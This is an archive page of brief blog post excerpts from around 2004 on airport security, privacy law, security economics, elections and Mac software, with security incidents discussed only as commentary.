[Microsoft] will publish a general summary of planned security bulletin releases three business days before each regularly scheduled monthly bulletin release… The advance notifications will include the number of bulletins that might be released, the anticipated severity ratings, and the products that might be affected. This has been available to select customers for a while. […]

 

Morris Worm is Sweet 16

Sixteen years ago, the first worm spread across the Internet. It used password cracking, a buffer overflow in fingerd, and a flaw in sendmail to spread. At least today, sendmail seems more secure. Passwords and buffer overflows, check back in sixteen more.

 

Symposium on Usable Privacy and Security (CFP)

The Symposium on Usable Privacy and Security (SOUPS) will be held July 6-8, 2004 at Carnegie Mellon University in Pittsburgh, PA. This symposium will bring together an interdisciplinary group of researchers and practitioners in human computer interaction, security, and privacy. The program will feature refereed papers, tutorials, a poster session, panels and invited talks, and […]

 

"Stop … Hurting … America"

Sure, the Electoral college is mostly winner-take-all, but America isn’t. The “red/blue” divide nonsense on TV is all about polarizing the country. See the map bigger here. It’s like Jon Stewart said to the boys at Crossfire: Stop hurting America. (Via BoingBoing.)

 

No Right To Be Free of Airport Searches?

Ed Hasbrouck writes: For the first time ever, lawyers for the USA Transportation Security Administration (TSA) will appear in court tomorrow in Seattle to try to defend their (still largely secret) procedures for the compilation and use by the TSA, law enforcement agencies, and airlines of “No-Fly” and “selectee” watch lists. … I got word […]

 

Liberties Eroded

On three occasions over the past five months, Tubiana said, outside judges assigned to review the vendor’s case have set deadlines for investigating magistrates to either indict or release him. The deadlines have passed, but his client remains locked up, court documents show. “There is in fact no control” over these magistrates, he said. “They […]

 

Reliability and Security

However, Engler thinks the security explanation should be taken with a grain of salt. His research in the late 1990s aimed to improve the reliability of software. Security analysis was part of the story, he says, but “basically, we just didn’t want stuff to crash.” (writes Jon Udell in Infoworld.) But Crispin Cowan has a […]

 

What's a Free Election worth?

As we go into the 54th Presidential elections under the US Constitution, two things , possibly related, have struck me. The first is the elections in Afghanistan. Millions of people ignored threats and went out to vote. Millions of them were women, given a say in their country’s government for the first time. The other […]

 

"I am searching for the truth as long as I can"

I recently blogged about Ted Taylor, and the book he inspired. He passed away recently: Thirty-one years ago, The New Yorker published a profile of nuclear weapon designer Ted Taylor, written by John McPhee. Published in book form as “The Curve of Binding Energy,” this was the first time the prospect of nuclear terrorism was […]

 

Rehnquist's Health

The announcement suggests that Rehnquist is suffering from anaplastic thyroid cancer, a rare and aggressive form of the disease, said Herman Kattlove, an oncologist and medical editor for the American Cancer Society. The anaplastic variety is the only type of thyroid cancer that is treated with chemotherapy. “It’s not treatable by surgery, only by chemotherapy […]

 

Hello? Earth to Justice Dept…

The New York Times reports: Lawyers for many of the detainees, including the ones named in the Supreme Court ruling, say the Bush administration is purposely ignoring the justices’ mandate and stalling. They cite the government’s refusal to acknowledge that detainees are entitled to free access to lawyers to make their cases before federal judges. […]

 

Canadian Privacy Law again

Last week, I commented on Michael Geist’s column. In part 2, he took an excellent direction. He suggests not only economics, but a legal structure that forbids Canadian companies’ compliance with US orders. Read it.

 

Privacy Protectionism

This month the B.C. government passed a law to prevent the U.S. from examining information on British Columbians that is in possession of private U.S. companies. The CBC reports on information about Canadians being sent to the US for processing, and the attendant legal risks. In Canada, they have strong-sounding data-protection laws that they don’t […]

 

Paranoia is rampant

Neither, of course, is true. But these rumors testify to one of the most distinguishing — and disturbing — aspects about this election: Paranoia is rampant. “I haven’t seen an election in which more people are worried about what’s going to happen to them on Election Day,” said Herb Asher, an Ohio State University political […]

 

Ian Grigg on SSL

Ian Grigg has a great page on the SSL industry (really the “certification authority” industry.) Worth reading. The topic reminds me of an essay, I think from Nick Szabo, on the use of language and terminology within the security industry to distort thinking. (The bit I remember discussed the use of “certification authorities,” self-declared.) I’m […]

 

Regulate that Arbirtrage!

An update on the Americans Stream to Canada For Flu Shots story: In eight days 3,800 people have jumped on the ship and paid their $105. Victoria Clipper’s Managing Director said the company had not expected there would be such a massive take up. The company says the day trips still continue, but the number […]

 

Canadian Charter of Rights And Freedoms

So let me get this straight… Quebec Court Judge Danielle Cote handed down a 153-page ruling that found two sections of the federal Radiocommunication Act violate the Canadian Charter of Rights and Freedoms. … Cote extended a grace period of one year before her ruling would come into effect. So the law is a violation […]

 

Canadian Charter, II

It seems a bizarre right to be allowed to watch TV, but not say insensitive things. (It’s sad that the car dealer felt ok insulting customers and turning away business. It’s sadder that the courts are intervening where the right answer would be more speech, publicizing intolerance and shaming the dealer.)

 

Johnnie Thomas again

On one occasion [Johnnie Thomas] was told that she had graduated to the exalted status labeled, ‘Not allowed to fly.’ She discovered that there was no method available for having ‘her’ name removed from the DNFL; indeed, one person from her local FBI office dismissively told her to hire a lawyer (although ironically, he refused […]

 

Online Extortion

There’s a long article by Joseph Menn in the LATimes about online extortion via DDOS attacks, and how much money it brings in. (Use Bugmenot for a login.) The threat involved massive denial of service attacks on a gambling site, using thousands of “zombie” computers sending data to the site. Its not clear how clever […]

 

Amazon (3 Comments on SteveC)

Something about a post by Steve got to me… Whenever amazon comes up in conversation I tell people how particularly behind they are but I don’t think I get the point across. Who does better? I find that it always works better to say who does well, rather than who does poorly. Let people figure […]

 

"Getting nothing wrong is for the uninspired"

Nat has a typically insightful post inspired by Muine, a radical re-think of what a music player on your computer should do. Why would those things be there? Because every other music app has those features, and if you’re building a music tool, you’ve got to have them too. Only, somehow, you’ve got to do […]

 

Bejtlich on Intrusion Data

Richard Bejtlich posts on “Will Compromises at Universities Aid Security Research?: Several recent events may give security researchers the data they need. For example, UC Berekely suffered an intrusion on 1 Aug 04 which jeopardized a database containing names, addresses, telephone and Social Security numbers collected by the California Department of Social Services (CDSS). According […]

 

Common Criteria

Statistics gleaned from the labs’ Common Criteria work indicates that the testing is improving security, said Jean Schaffer, director of NIAP. Schaffer spoke during a session at a Federal Information Assurance Conference held this week at the University of Maryland. So far, 100 percent of the products evaluated have been approved, she said. The testing […]

 

DHS Inspector Report

According to a new report from the Department of Homeland Security’s inspector general, airport screeners still Need Improvement. That will not come as a surprise to anyone who travels, but some of the details, as reported by A.P., are still disturbing: -Screeners aren’t tested on when they should pat down passengers and what the passengers’ […]

 

"Americans stream to Canada for flu shots"

With a US shortage caused by contaminated vaccine and flu season approaching, business has been brisk at Canadian clinics and doctors’ offices along the border from British Columbia to as far east as New Brunswick. A Canadian Internet pharmacy is working with a half-dozen physicians in Montreal to offer weekend flu-shot tours to New Yorkers. […]

 

Piscitello on Bugtraq

My frustration level with bug-traq increases in direct proportion to the frequency at which wannabes report vulnerabilities on software that has limited consumption and little business on a business network. I finally contacted some of the wannabes. I probed each for more specifics than the original bug disclosure: I think that Dave has a valid […]

 

Query Address Book.app

The Little Brother’s Database, an addressbook program, includes a tool, ABQuery, that allows you to look inside the Mac’s address book from the command line. (Via MacOSXHints.com.)

 
 

IPod, so?

Apple announced a new Ipod that shows pictures. What I want to know is, where’s the 8-in-1 media reader to take photos directly from your camera?

 

Howard Stern vs. Michael Powell

Michael Powell was on the Ronn Owens show. 15 minutes into the show, Howard Stern calls in. Listen here. As Sama says, Stern is an unfortunate advocate for free speech. But its nice to hear someone directly challenge America’s censor. (Via BoingBoing.)

 

The Curve of Binding Energy

Is the story of Ted Taylor, one of the cleverest of the very clever men who designed nuclear bombs. He designed the largest bomb ever set off by the US, and the smallest. He once used a nuclear bomb to light a cigarette. And in the early 1970s, he was very concerned that terrorists could […]

 

Sixth Circuit Reverses Lexmark

One of the worse bits of law to come out of the Clinton years was the “Digital Millennium Copyright Act,” (DMCA). The law made it a crime to break any copy protection scheme, even if the data it was protecting was subject to some form of fair use. The law had lots of nasty chilling […]

 

Some explosives links

But the real issue is that the explosives can be used against civilians and soldiers in Iraq and around the world. Consider that only five grams of RDX, for example, is enough to kill a person when used in an anti-personnel land mine. When 1,000 pounds of explosives were set off by a suicide bomber […]

 

Mistakes, Incompetence, and Coverup Beyond Fevered Imaginings

Michael Froomkin has a long post on the 350 tons of stolen high explosives, which I’m excerpting at length: If all that matters is our safety and security, then today’s news makes it clear beyond peradventure that the Bush administration is horribly dangerous to our national security. Josh Marshall’s blog today runs an extensive quote […]

 

Marginal Revolution: Democracy: Theory and Practice

Steven Landsburg makes a very entertaining point about democracy: …It is worth observing that if you really believe in democracy, and if the election is close, then it doesn’t much matter who wins. The theory of democracy (stripped down to bare essentials, and omitting all sorts of caveats that I could list but won’t) is […]

 

The Security/Security Tradeoff

People trying to infringe our privacy often claim that they’re making a tradeoff between security and privacy. Sometimes they’re even right. But I think today, we’re trading security for “security,” giving up real protection for an illusion. For example, the TSA is spending lots of money to build and connect databases all about travelers. For […]

 

I wonder what this means?

I’m trying to submit my comments on Secure Flight. When I try to upload my file to http://dmses.dot.gov/submit/ProcessES.cfm, I’m told: An error occured while attempting to upload your comment [Microsoft][ODBC driver for Oracle][Oracle]ORA-01401: inserted value too large for column I’ve submitted a request for help via the provided link.

 

TSA Wastes More of Your Money

WASHINGTON — The Transportation Security Administration was lax in overseeing a $1.2 billion contract to install and maintain explosives-detection machines at U.S. airports, resulting in excess profit of about $49 million for Boeing Co., a Department of Homeland Security review found. (From a Wall St Journal article, October 19th. (Sorry, subscriber-only link.)

 

Nielsen on Security

Jacob Nielsen has a very good analysis of security, followed by a not-so-great set of suggestions. He is spot on in saying that 1) it doesn’t work, 2) it puts the burden in the wrong place, and 3) this has nasty side effects. (I’d reverse 1 & 2, as the economics predict #1, but thats […]

 

Mac "Virus"

There’s an alarmist headline at MacSlash about a new mac virus. Its been picked up in a bunch of places. The commenters correctly identify it as a rootkit, not a virus. A rootkit is a program you install, after break in, to hide your tracks. Its not even a sophisticated rootkit. Its stunningly primitive. Reading […]

 

Organization in the way: how decentralization hobbles …

Another interesting article from Peter Merholz closes with: Until now, user experience efforts have been focused on building teams that practice user-centered design (UCD). However, researchers at User Interface Engineering recently discovered that the size of an organization’s UCD practice is somewhat inversely proportional to the site’s usability. You read that right: Companies that invest […]

 

"Metadata for the masses"

In “Metadata for the masses,” Peter Merholz presents an interesting idea, which is build a classification scheme from free-form data that users apply. He points to Flikr’s “Cameraphone” category, which would probably not exist if there was only a pull-down list. He also points up problems: Many categories for one thing (nyc, NewYork, NewYorkCity), one […]

 

What a Great Review

NudeCybot sent me a link to an interesting looking book on “Sorting Things Out.” I found this review resonated with how I often feel reading academic work: This tragic book is full of important ideas and significant research, but it’s so poorly written you hardly notice. Other reviews kindly describe its style as “academic,” but […]

 

2-Fingerprint Border ID System Called Inadequate (washingtonpost.com)

Rep. Jim Turner (D-Tex.) wrote that a study by researchers at Stanford University concluded the two-finger system “is no more than 53 percent effective in matching fingerprints with poor image quality against the government’s biometric terrorist watch-list.” Turner said the system falls far short of keeping the country secure. Its not clear to me why […]

 

Efficient Markets and Prediction

In a post below, I quoted my friend Craig commenting on the differences between election sites and the IEM. Steven Landsburg had previously commented privately that IEM together with TradeSports is inefficient. By playing one against the other you could make money on either likely outcome of the election. So, if these markets were efficient, […]

 

Security Signaling

Signaling is a term from the study of lemons markets. A lemons market is a market, such as in used cars, where one party (the seller) knows more than the buyer. There are good cars (peaches) and bad ones (lemons). The buyer is willing to pay a fair price, but can’t distinguish between the cars. […]

 

Notational Velocity

Andrew Stewart pointed me to Notational Velocity, an interesting little note taking app. Its a little disconcerting at first, because you only have one note area, and the way to create a new note is to just overwrite the old title. (There’s a menu item to rename something.) But worth checking out if you’re a […]

 

"Television cameras captured the moment the Cuban leader fell"

Unfortunately, the BBC is simply reporting on him falling over, not on his 45 year dictatorship being toppled, the Cuban people gaining a measure of self-determination, or the freedom to speak one’s mind: A few blocks away, a 27-year-old man who didn’t want to give his real name, had some advice for the only president […]

 

Secondary Screening: JetBlue FOIAs

Ryan Singel has a long and worthwhile post at Secondary Screening on the JetBlue FOIAs. I have only one thing to add, which is that his closing line somewhat misses the mark: But this issue is not going away as there is at least one report coming out soon that will further complicate the debate […]

 

The Tree of Life, COI-ly

The September 30th issue of the Economist points to an article in PLoS Biology by Hebert, et al, discussing a new technique for identifying species. The technique, which relies on mitochondirial genes for cytochrome c oxidase I (COI), which is a 648 pair gene. [1] This technique helps settle the question of “Is Astraptes fulgerator […]

 

So Cynical, I Wish I'd Thought of It.

My friend Craig Sauer wrote: In the spirit of the equal time, here’s what’s keeping me from being optimistic about Kerry’s chances: The Iowa Electronic Markets. You’ll have to read on the site to get the real skinny, but basically, the IEM is a real-money futures market where people make informed “bets” about who is […]

 

Hackers sabotage Waikato (NZ) food company

Computer hackers have emailed 3000 of the company’s customers, saying a company product – lamb chips – are being recalled due to an infectious agent, and the warning has since been posted on internet message boards. Sad as it is for Erik Arndt and Aria Farm that this has happened, I think this is interesting […]

 

"What your CEO thinks about security"

Larry Poneman writes: Unfortunately, CEOs have persisted in focusing on four basic questions that too often stump the most savvy IT professionals: What is the security return on investment? What is the probability of a catastrophic security failure? What is the cost of self-insuring against security risks? What are the tangible benefits of being an […]

 

Neal Stephenson at /.

In order to set her straight, I had to let her know that the reason she’d never heard of me was because I was famous. … Mind you, much of the authority and seniority in that world is benevolent, or at least well-intentioned. If you are trying to become a writer by taking expensive classes […]

 

Powerpoint, usability

I’ve put slides and a pdf from a talk yesterday on my homepage. Making pdf is easy on the mac, making html less so. Since this is the web, I’d like to put up html of the slides, and I think that the HTML that PPT produces is poor. In particular, I’d like smaller files, […]

 

Must … extend … grasp!

Each aircraft operation … with a MTOW of more than 12,500 pounds, must conduct a search of the aircraft before departure and screen passengers, crew members and other persons, and all accessible property before boarding in accordance with security standards and procedures approved by TSA. … [Seperately, charter aircraft run as clubs…] These clubs transport […]

 

Thoughts on SB 1386

Looking for a link to SB 1386, I noticed that of the first 10 Google hits, 2 are legislative, 2 are law firms, 3 are information security portals, and 3 are for security companies. Three of the security companies, (Verisign, Threatfocus and Watchfire) are simply adding “SB 1386” to existing products, and claiming to provide […]

 

1.4 Million Californians Exposed

A computer hacker accessed names and Social Security numbers of about 1.4 million Californians after breaking into a University of California, Berkeley, computer system in perhaps the worst attack of its kind ever suffered by the school, officials said Tuesday. (This is all over the web, I found a version at News.com.com.) A few questions […]

 

"I do not approve"

Alex Tabarrok writes: The headline in the Washington Post yesterday read “FDA Approves Artificial Heart for Those Awaiting Transplant.” The language annoys me – it sounds as if the FDA gave a Good Housekeeping Seal of Approval to the artificial heart. Consider how much clearer the tradeoffs of medical policy would be if instead the […]

 

Polite Technology

Michael Froomkin points to Wired’s article Inventor Rejoices as TVs Go Dark, is enough to make me want a TV-B-Gone. It fits on your keychain, “looks like an automobile remote, has just one button. When activated, it spends over a minute flashing out 209 different codes to turn off televisions, the most popular brands first.” […]

 

Canadian Privacy Law

Michael Geist’s recent … Toronto Star Law Bytes column focuses on a recent Canadian privacy finding involving an inadvertent email disclosure. The column contrasts the finding with a similar incident in the United States and argues that for Canadian privacy law to garner the respect it needs to achieve widespread compliance, the Privacy Commissioner’s office […]

 

$103 Million

To date, the government has wasted over $100 million in a flawed effort to improve airport security by identifying passengers and, well, doing something to the naughty ones. Meanwhile, the reality is that airport screeners continue to miss items like knives, guns and bombs. Meanwhile, there’s lots of good work in computer vision systems, which […]

 

Security and Economics

Household Finance, a unit of HSBC, has sent me a $5,000 check out of the blue. Big verbage on the front indicates that “Signing this check will result in a loan…” at 23%, which over 5 years comes to an estimated $3,500 in finance charges. Most attractive. Now, ignoring Household’s record of fraud, and ignoring […]

 

Unsecure Flight, Because TSA is Asking For It

The ever-energetic Bill Scannell has set up unsecureflight.com for you to politely but forcefully register your comments with the TSA on what they’re doing to our privacy. Why use Unsecure Flight over the TSA’s site? It’s easier! There is a public record of your comment, the TSA can’t silently discard it. There’s a plethora of […]

 

More on Patches & EULAs

In a comment below, Nudecybot mentions Mark Rasch’s “You Need A Cyber-Lawyer” article in Wired News. I don’t buy this line of reasoning. Making a decent auto-lawyer requires being able to parse legalese, which is a hard problem. Now, legalese is a subset of English, so you might think that the weather parsers, or similar […]

 

Why Profiling Won't Work

WVLT VOLUNTEER TV Knoxville, TN reports: ” Accused Domestic Terrorist Arrested In Knox County.” According to the criminal complaint, the FBI says that Ivan Braden was planning to enter this Armory Friday, armed with guns and bombs. … The feds say the former 278th soldier planned to take people hostage at the Lenoir City Armory and […]

 

Obfuscated Voting Contest

There’s a long running contest to write C code that’s hard to understand. Daniel Horn has taken it one step further–the goal is to write a program that looks right, but actually produces bogus counts in on of several ways. It’s brilliant!

 

Good News from the Courts

“We cannot simply suspend or restrict civil liberties until the War of Terror is over, because the War on Terror is unlikely ever to be truly over,” Judge Gerald Tjoflat wrote for the panel. “Sept. 11, 2001, already a day of immeasurable tragedy, cannot be the day liberty perished in this country.” A three judge […]

 

Good News from the Courts

“We cannot simply suspend or restrict civil liberties until the War of Terror is over, because the War on Terror is unlikely ever to be truly over,” Judge Gerald Tjoflat wrote for the panel. “Sept. 11, 2001, already a day of immeasurable tragedy, cannot be the day liberty perished in this country.” A three judge […]

 

Tied With Alec M.

This site has a Wankometer rating of .58, which is exactly the same level that Alec Muffet got. The white house (1.40) is apparently more wanky than the BBC, but less wanky than Sun. The George Bush and John Kerry for President sites score .63 and 1.83, respectively. I can’t believe Alec is nearly as […]

 

Bush's Certainty

A few days ago, I commented on Bush’s lack of self doubt. Now Ron Suskind takes on the theme in a 10 page article in The New York Times, entitled “Without A Doubt.”

 

Google's Imperfections

The ever-entertaining Nat talks about Google’s desktop search (for Windows), and says “Google shocked the world by releasing something highly imperfect.” Really? Google’s been imperfect a lot lately. Have you tried using Gmail with Safari? It pops up three windows every time you click a link. Orkut? Bad server, no donut. (Actually, the issues seem […]

 

Google and "Privacy"

There’s a critique of Google’s new Desktop Search that it…wait for it…searches your computer! No, really, it does. And so it finds things that are … on your computer! Some of these things, like your email, your spouse’s email, your IM logs, are things that Microsoft hides intra-user are exposed. This is probably a bad […]

 

Counter-point On ID Cards

The always insightful Michael Froomkin has an article called The Uneasy Case For National ID Cards, which I wanted to link to earlier. I don’t like his arguments, being a believer that privacy invasion is a slippery slope. I expect that laws put in place to protect privacy around a national ID card will be […]

 

John Gilmore, you have a fan

I was flying home recently from a very quick jaunt out to do a customer install. I went to the back of the plane to stretch, and noticed that (horror of horrors) there were people congregating and talking! Fortunately, they were white Americans, so they weren’t scary. Anyway, I got to talking with them, and […]

 

Social Software

Chris Allen has a typically long, thoughtful essay on the history of social software, going back to Vannevar Bush and Memex. I think one of the more interesting transformations was that of collaboration to introduction, with services like LinkedIn or Spoke trying to add practical applications to Milgram’s work on connectedness, and I’m surprised that […]

 

Patches & EULAs

Security patches should not have licenses. There’s no fair re-negotiation under threat. If I bought your software, and am using it, then you find a bug, you should not be allowed to put new terms on the software in order for me to be safe using it. Imagine a hotel which lost a master key […]

 

Department of Justice to Focus On Key Problems!

Attorney General John Ashcroft has announced a major new effort to crack down on intellectual property theft, by which he apparently means illegally-copied DVDs, CDs, and software. (I refuse to use the term piracy to refer to illegal copying. Piracy is the violent boarding and theft of property on ships, and is a major problem […]

 

Financial Cryptography: The Medici Effect

Gramme has a long interview with the author of the Medici Effect over at Financial Cryptography. The book focuses on how the Medicis helped drive the Renaissance by bringing together a slew of people from different cultures and backgrounds. Far too often people become narrowly focused on issues that their peers agree are important. They […]

 

Perverse Cooperation

A new technique has won the 20th anniversary competition in iterated prisoner’s dilemma. The technique involves a sequence of moves designed to signal other players that they are competing with one of the great many other Southhampton university submissions. When they discover that, one entry will self-sacrifice such that the other can rack up a […]

 

Perverse Incentives

“It’s O.K. to spend $85 on a hotel, $15 for parking and another $15 for breakfast, but if you spend $90 for a hotel where parking and breakfast are included, you’re over budget,” he said. “And it’s O.K. to drive 400 miles in your own car and to get reimbursed at 34 cents per mile, […]

 

"A Sign Of The Times?"

A woman said she drove home to San Diego from Denver rather than submit to what she viewed as an intrusive search by airport security screeners. Ava Kingsford, 36, of San Diego said she was flagged down for a pat-down search at Denver International Airport last month as she prepared to board a flight home […]

 

Federal Anti-terror Money Well Spent

Ok, you know I’m being sarcastic with the title. The New York Times titles its article “Security Grants Still Streaming To Rural States.” And the message is politics remains more important than ensuring that those cities likely to be hit next are well prepared. The article goes on to cite politics as usual as the […]

 

J8 RUSITH?

So it seems that Apple installs /bin/ps setuid root. (Scare #1). It seems also that the last bits emitted by a ‘strings /bin/ps’ is J8 RUSITH? . I have no idea what that is or what it means, but I think it belongs on a tshirt. (Thanks to Dave and Ted for validating those for […]

 

Bush, Socrates, and Information Security

“Wherin links between a number of disparate ideas are put forth for the amusement of our readers” Orcinus talks about one of Bush’s answers to a question in last night’s debate.* (I thought Bush did surprisingly well, but think that Kerry still came out slightly ahead. Both, depressingly, still want to spend my money on […]

 

Secondary Screening

Ryan Singel has a couple of good posts up: Why Privacy Laws and Advocates Matter and Trusty Logo Not Worth The Pixels It Is Printed On. The later explains in detail what economics predicts: Trusty won’t shaft its paying customers to make them actually enforce privacy policies, when people who rely on the trusty seal […]

 

Afghan Elections

The elections in Afghanistan have apparently gone off with fewer problems than expected, which is outstanding. (And hey, the ink I mentioned to Sama makes an appearance!) I am slightly worried by a line in The New York Times article, ” International organizations, which spent $200 million to finance the election, indicated that they had […]

 

Quicktunes

I listen to a lot of music. When I visit friends, I often invite them to drop random discs they think I’d like into iTunes for a rip. Combine that with my cd habit (“I can quit anytime!”), and I have a fair bit of music that I don’t recognize quickly. So I just found […]

 

Want to Save American Lives?

Do you want to save American lives? Stop senseless deaths? Here’s some ideas: Require real driver training, and enforce traffic laws. Ration the sale of alcohol to prevent the nasty diseases over-indulgence causes. Ban tobacco. Ban firearms. Require calisthenics in the morning, by neighborhood, and in the afternoon, at work. Ban the use of corn […]

 

Can Prayers Heal?

There’s an article in today’s The New York Times asking, Can Prayer’s Heal? (Critics Say Studies Go Past Science’s Reach). The article talks about a number of studies that apparently show a correlation between being prayed for and better medical results. The article also talks about how flawed some of the studies are, once you […]

 

Apple Security UI

I just got a fascinating email. No, not really. It was a simple little email, from someone who’s being very helpful on a project that I’ll speak of in excrutiating detail later. What was fascinating about it was that it was PKCS 7 signed, and Apple’s Mail.app told me so. It told me so with […]

 

ACLU vs. Ashcroft

The ACLU has made the TSA explain to the American people some subset of the faulty reasoning, faulty processes, and broken systems behind the so-called “No fly” lists, which have now snared, along with Johnnie Thomas and David Nelson (all of them), 3 members of Congress. Read the articles, Faulty ‘No-Fly’ System Detailed (Washington Post) […]

 

The FBI and Library Subpoenas

Orin Kerr discusses (deep breath!) Michael Froomkin links (via Proof Through the Night) to this story from a Seattle TV station about a local library that has fought off an FBI subpoena for a list of names and addresses of who took out a book on Osama bin Laden. Kerr does a good job of […]

 

Virginia Misses Point, Over-reacts

In response to 9 hijackers getting fraudulently issued ID cards from the state DMV, Virginia is considering issuing harder-to-fake ID cards that will broadcast your identity. As long as the value of an id card keeps going up, the reward for breaking the system will go up as well. If you want to rely on […]

 

Use Blogger, Be Ignored

Every now and then, I come across a blog I want to skim regularly. When its easy to do so, I add it to my list. Which is to say I drop the RSS feed at NetNewswire, and I then at least see the headlines. Blogspot/Blogger doesn’t make it easy to add RSS to your […]

 

How Banning Wireless Reduces Security

IDC’s research director, Lars Vestergaard, said their research found interest by businesses in WLAN usage was widespread, but not many of them were particularly interested. “Unfortunately IT managers are being uncertain about using this technology, but they use a lot of bad excuses,” he said. “This is because they often fear a lack of security […]

 

Electronic Voting Machines Will Destroy American Democracy

If you somehow missed it, AP released a “test article” claiming Bush had won re-election. BoingBoing has the story, and screen captures of a web site that carried it. We all know that computers don’t make mistakes, and that software is bug-free. More seriously, we need to take a lesson from Florida, and understand that […]

 

Taxonomic Software

A small window into a large world, with its own software: biological software, including DELTA, a DEscription Language for TAxonomy, database software, ecology software, morphometric, paleontologic, and phylogentics software. (Hey, I need a taxonomy just to keep the breakdowns straight!) Or DMOZ has a page, but it doesn’t seem as comprehensive. What I want to […]

 

Taxonomies

Biological taxonomy is not fixed, and opinions about the correct status of taxa at all levels, and their correct placement, are constantly revised as a result of new research, and many aspects of classification will always remain a matter of judgement. The ITIS database is updated to take account of new research as it becomes […]

 

Factcheck.com, the story

As anyone who takes advice from the Vice President now knows, he didn’t really mean to tell you to go to factcheck.com, but factcheck.org, whose article still doesn’t fully support his point. This little glitch lead the owners of factcheck.com, a small site that lists sellers of dictionaries and encyclopedias, to suffer a massive denial […]

 

Editing MacOS X menus

There’s useful instructions here as to how to add a “Paste as Plaintext” option to iChat. If you’re reasonably technical, you can go off and do all sorts of neat stuff here.

 

Cool maps

Christopher Allen has a cool post about a map mash up, along with some analysis of what makes it work.

 

Calls for Papers

There’s a set of interesting conferences looking for papers: Privacy Enhancing Technologies Economics of Information Security Codecon [update: closed html list tag]

 

Ranum on the root of the problem

Marcus Ranum writes a good article for ACM Queue, in which he points out that better tools to improve languages can help. I take issue with his claim that better languages can’t help. Java, because of its string representation, is harder to mess up with than C. Its not perfect, and no useful language can […]

 

Economics of Information Security

Jean Camp and Stephen Lewis have done a great job of bringing together papers on Economics of Information Security in a new volume from Kluwer Academic press. (It’s even better because it has my first book chapter, which is What Price Privacy, joint work with Paul Syverson. We’ll put it online as soon as the […]

 
 

How about "Align with the business?"

I normally have a lot of respect for CIO Magazine. Their journalists cover the topics that matter to CIOs, they remain focused on how to make the technology support the business, etc. That’s why I was surprised to see this CIO’s Guide To Safe Computing, which starts: Ellyn believes that companies should strive for a […]

 

0wned in 60 seconds

0:56 – A student system in Founders scanned victim on TCP port 445 (file sharing). Victim responded. Student system immediately closed connection and opened a new connection on victim port 445. Following LAN Manger protocol negotiation and MS/DCE RPC Bind, student system attacked victim with buffer overflow to exploit Microsoft LSASS vulnerability. Less than 60 […]

 

"What's The Cybersecurity Czar's Job?"

But while we consider whether the position should be upgraded, we should also ask what the cybersecurity czar should be doing in the first place. says Ed Felten, and he’s right. He suggests two main jobs: Securing the fed’s infrastructures (and in doing so, pulling for more secure product), and imposing liability rules. Ed correctly […]

 

Spaceship One Lands!

Watching the NASA video, SpaceshipOne just won the X-Prize, having made space twice in under 14 days. Congratulations to Burt Rutan and his whole team.

 

Cherishing the Customer, Redmond Style

My 12-year-old at home doesn’t want to hear that he can’t put all the music that he wants in all of the places that he would like … says Steve Ballmer. It’s good to see Microsoft, like the health care industry, catering to people other than end-users. If they were as smart collectively as they […]

 

Cool Mac Utility

That said: my home directory is now encrypted which should make any further hardware maintenance a doddle (no more erase/flood before mailing) and I’ve blown-away the old UFS partition which although useful was tying up a few too many Gb. Alas the rebuild doesn’t seem to have fixed the lack-of-sleep-on-lid-closure problem. One more for Applecare. […]

 

Why Is Private Health Insurance Such A Disaster?

Why cannot markets allocate this function to the least cost decider? Why does the usual solution — intermediation — appear to be working so badly? Asks Tyler Cowen over at Marginal Revolution. I believe that a large part of the problem comes from a side effect of the employer subsidy. Because health insurers are selling […]

 

More on Amit Yoran

The House will propose moving cybersecurity offices from the Department of Homeland Security to the White House as part of the intelligence reorganization, according to draft legislation obtained Wednesday by The Associated Press. The bill, expected to be introduced Thursday, would place cybersecurity into the White House budget office. … The new proposal would create […]

 

The Blog That Broke the Bank of England

You have to respect a man who can take on a central bank and win. The Motley Fool did a nice bio piece with background. And now, he’s blogging. [Update: Oops! Via BoingBoing]

 

Secondary Screening

Ryan Singel has a great post on the watch lists, and the keystone-cops fumbling behind the scenes.

 

A Million Deaths Is A Statistic

Matt Cordes modified the Zombie simulators to give humans a chance to fight back. Its fascinating, because with some small mods to the source, you get a much more interesting simulation. (Unfortunately, I don’t see Matt’s source anywhere, so I can’t say how long it might have taken.) The simulation makes viscerally clear how chains […]

 

Shaun of the Dead

I saw the excellent Shaun of The Dead last night. (Or see Quicktime trailers or the official site. Or heck, just buy it from Amazon.co.uk where it’s already available on DVD, but only if you have a free-world DVD player. Ok, really this post is an excuse to link to the Zombie Infection Simulation in […]

 

That settles it

One of the best signs that things are going down the tubes is that officialdom tries to control information flow. I now know that things in Iraq are officially going to hell, because the security situation is bad enough that they’re trying to prevent people from learning about it. Kroll, a large physical and investigative […]

 

Amit Yoran resigns

Amit Yoran, a former software executive from Symantec Corp., informed the White House about his plans to quit as director of the National Cyber Security Division and made his resignation effective at the end of Thursday, effectively giving a single’s day notice of his intentions to leave. Yoran said Friday he ”felt the timing was […]

 

Why Is Air Travel So Cheap?

The cost of last minute ticket doesn’t seem to be enough for airlines to break even. How much of this is due to a lingering fear of flying? How much of it is the extra cost to travelers, in inconvenience and hassle, of being bit players on the security stage? As long as a carrier […]

 
 

Iraq

I’ve realized recently that I have no real idea of what’s happening in Iraq. On the one hand, we have bubbly optimists like Chrenkoff. On the other, people like Wall St Journal reporter Farnaz Fassihi, whose email is getting wide circulation. The Iraqi bloggers I read (generally) sound more optimistic than despairing, which is good. […]

 

Nevada Gaming Commission vs. Diebold

It’s always good to see our best resources being applied to the most important things in society, like voting. The “independant” validation, paid for by the software creators, is closed to the public. But when the Nevada Gaming Commission gets into the act, it seems they know a scam when they see one. (Disclaimer: I […]

 

A message from God?

Bob Morris maps hurricanes Ivan, Charley, and Frances against voter maps. (No mention of Jeanne, which seems to have taken the same path as Frances. Enquiring minds want to know, is this that Bob Morris?

 

Travel, Speaking Plans in October

I’m speaking at the Atlanta Chapter of the High Tech Crime Investigative association, October 11th, on a “Privacy Industry View of Reducing Cybercrime.” This is an extended version of Zero-Knowledge’s talk we gave to law enforcement. I’m speaking at the Inaugural Security Leadership conference, in Arlington, Texas on the 19th, on “Beyond Penetrate, Patch and […]

 

"A Roadmap for Forgers"

Ed Felten has a great post over at Freedom To Tinker about Rather-Gate: In the recent hooha about CBS and the forged National Guard memos, one important issue has somehow been overlooked — the impact of the memo discussion on future forgery. There can be no doubt that all the talk about proportional typefaces, superscripts, […]

 

Cultural Imperialism At Its Best

